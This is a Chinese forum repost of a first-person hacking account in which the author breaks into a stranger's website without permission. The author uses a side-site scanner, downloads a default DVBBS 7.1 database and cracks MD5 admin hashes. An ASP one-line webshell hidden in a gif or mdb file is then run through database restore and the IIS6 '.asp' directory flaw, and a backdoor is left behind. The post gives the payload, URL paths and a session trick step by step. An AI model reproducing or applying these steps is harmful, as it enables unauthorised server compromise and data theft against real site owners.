转自:http://www.wrsky.com/read.php?tid=565
作者:firefox+lvhuana
今天上午上网的时候,非常无聊,好友都不在线。
正在无聊的时候,突然qq响了,一个陌生人要加我,顺便先看下他的资料,哦哦,原来这个人还有个人站点呢,通过他加我请求。然后开始看他的个人站点,原来是一个外挂站,晕糊中,外挂站点的人加我作什么。。。。
想想进他的站点看看吧,打开明小子的旁注工具2.2版本(这个启动速度快,我喜欢),扫了一下,看到他站点所在的服务器上面还有几个站点,再仔细扫了一下,发现一个dvbbs7.1的论坛的数据库是默认的dvbbs7.mdb,下载之,然后杀毒软件查下没有木马存在(现在有些无聊的人喜欢放一个默认数据库名字的木马来钓鱼。。小心为好),打开数据库找到管理员的后台账号密码和前台账号密码散列,破解一下吧,运气不错,几分钟md5的散列破解完毕了,全数字的前台密码。
登陆进去,再登陆进后台。好久不搞国内站了,手生中。。。。老思路,上传一个自己制作的asp语句插入gif图片中的asp木马(当然是更改为.gif了)。上传成功,然后到后台去还原数据库去,晕乎乎的,怎么提示无法识别的数据库格式,失败了。。看来动网现在成熟的多了,估计是对文件的头部做了识别了??接着想办法吧。。
看到现在7.1版本的都有了blog功能了,在后台看看blog设置吧,突然看到有上传设置哦,而且还可以设置上传类型,增加一个mdb的文件格式吧,不错不错,增加成功。然后自己在本地建立一个空的mdb数据库,里面的内容为<%eval(request(\"lv\"))%>,然后把这个数据库上传,成功上传,再晕,怎么不是直接显示出相对路径的?而是fileid=1。。再到后台的blog管理那里找,找到上传的文件夹是Boke/UploadFile/,然后在上传管理那里找到了我上传的mdb文件,这下看看动网还能禁止我还原数据库么!?
成功还原数据库为.asp了,嘿嘿,一个webshell到手了,然后进入服务器,发现是win2k3的哦,看来执行cmd是没戏了,到处转转后找到d盘竟然能遍历,还有ser-u安装在d盘啊,浏览ServUDaemon.ini找到了目标站的物理路径,跳转到目标站的目录,然后留后门,好了,玩完了,撤退。
鉴于是win2k3系统的,大家都应该知道win2k3的一个文件夹名如果是.asp的话,这个文件夹里面的任何文件都做为asp来处理的,让我们再深入测试一下。在后台备份那里把备份路径改一下,改为.asp/,如果害怕失败的话,就用url编码一下那个.,就是%2easp/,然后备份数据库,这样就会得到一个.asp的目录,然后在上传设置那里把文件上传目录设置为.asp/,这样的话,所有的文件都上传到这个文件夹里了。回到前台,上传我的那个把一句话木马插入gif文件的那个2006s.gif,上传成功后,http://www.****.com/.asp/2006-2/200622714435439658.gif这个就是我们的shell了。用客户端连接,得到一个2006的webshell,不过输入密码后进入的时候会返回一个404错误,原因是ie把.asp后面的省略了,再次把http://www.*****.com/.asp/2006-2/200622714435439658.gif放在?%23=Execute(Session(%22%23%22))&pageName=PageList前面,seesion欺骗了一下,这个webshell就能正常使用了。
垃圾文章,可能还有其他更简单的方法,希望大家谁知道告诉一下。